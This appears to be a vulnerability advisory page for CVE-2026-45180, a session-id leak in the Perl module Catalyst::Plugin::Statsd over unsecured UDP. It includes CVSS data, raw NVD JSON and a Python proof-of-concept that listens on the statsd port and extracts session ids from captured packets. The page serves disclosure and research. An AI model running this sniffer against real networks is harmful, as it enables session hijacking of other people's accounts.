Security Vulnerability Report
中文
CVE-2026-45180 CVSS 7.5 HIGH

CVE-2026-45180

Published: 2026-05-10 21:16:29
Last Modified: 2026-05-12 16:48:58
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Catalyst::Plugin::Statsd versions through 0.10.0 for Perl may leak session ids. If the communication channel to the statsd daemon is not secured (for example, by sending UDP packets to a host on another network), then users' session ids may be leaked. This may allow an attacker to use session ids as authentication tokens.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Catalyst::Plugin::Statsd <= 0.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# This script simulates an attacker sniffing network traffic to capture leaked Session IDs via UDP. # It listens on the standard Statsd port (8125). import socket import re # Configuration UDP_IP = "0.0.0.0" UDP_PORT = 8125 # Regex pattern to simulate matching a Session ID (e.g., hex string) SESSION_ID_PATTERN = re.compile(r'session_id=([a-f0-9]+)', re.IGNORECASE) def sniff_statsd_traffic(): # Create a UDP socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind((UDP_IP, UDP_PORT)) print(f"[*] Listening for UDP packets on port {UDP_PORT}...") while True: try: # Receive data data, addr = sock.recvfrom(1024) # buffer size 1024 bytes message = data.decode('utf-8', errors='ignore') # Check if the packet contains sensitive info match = SESSION_ID_PATTERN.search(message) if match: captured_sid = match.group(1) print(f"[!] Potential Session ID captured from {addr}: {captured_sid}") print(f" Payload: {message}") else: print(f"[+] Received stats from {addr}: {message}") except KeyboardInterrupt: print("\n[*] Stopping sniffing.") break except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": sniff_statsd_traffic()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45180", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-10T21:16:29.170", "lastModified": "2026-05-12T16:48:58.260", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Catalyst::Plugin::Statsd versions through 0.10.0 for Perl may leak session ids.\n\nIf the communication channel to the statsd daemon is not secured (for example, by sending UDP packets to a host on another network), then users' session ids may be leaked. This may allow an attacker to use session ids as authentication tokens."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "references": [{"url": "https://github.com/robrwo/CatalystX-Statsd/security/advisories/GHSA-gjvr-hq83-fc38", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://github.com/robrwo/Plack-Middleware-Statsd/security/advisories/GHSA-9gwm-665p-w2xx", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/RRWO/Catalyst-Plugin-Statsd-v0.10.0/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-45179", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.